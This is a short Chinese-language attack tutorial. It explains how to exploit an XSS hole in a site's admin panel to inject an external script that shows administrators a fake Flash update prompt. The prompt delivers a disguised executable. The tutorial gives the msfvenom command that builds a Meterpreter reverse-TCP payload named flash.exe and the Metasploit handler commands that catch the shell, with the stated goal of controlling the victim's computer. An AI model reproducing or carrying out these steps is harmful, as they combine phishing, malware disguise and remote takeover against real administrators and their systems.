1.复制xssaq.com中的公共模块中的flash钓鱼的js代码
2.在www下新建一个js文件,把代码复制进去
3.寻找受害者,目标为后台的管理员,找一个xss漏洞让管理员的页面引用外部的我们的js文件
4.管理员后台页面执行了我们发过去的引用外部文件的script代码
5.当管理员点击立即升级的时候,会让管理员下载一个可执行程序,控制下载文件的代码在1.js中,为了更容易让管理员相信,将文件命名为flash.exe,管理员再次点击立即升级时,下载的文件就成了我们的flash.exe。
上面的flash.exe是我们要让管理员下载运行的病毒文件,当管理员下载运行后我们就能控制管理员电脑了
如何制作病毒及伪装病毒
1.打开kali制作病毒
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.126.130 LPORT=4444 -f exe > shell.exe
未找到命令的话执行下列命令
apt-get update
sudo apt-get install metasploit-framework
再次运行
2.把shell.exe拖到我们的假网站上并改成flash安装包的名字
3.这个病毒已经能够正常使用了,我们先在kali中当做攻击者对自己的病毒进行监听,看看受害者有没有点击病毒,如果点击的话,我们会接收到这个监听
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.126.130
set lport 4444
run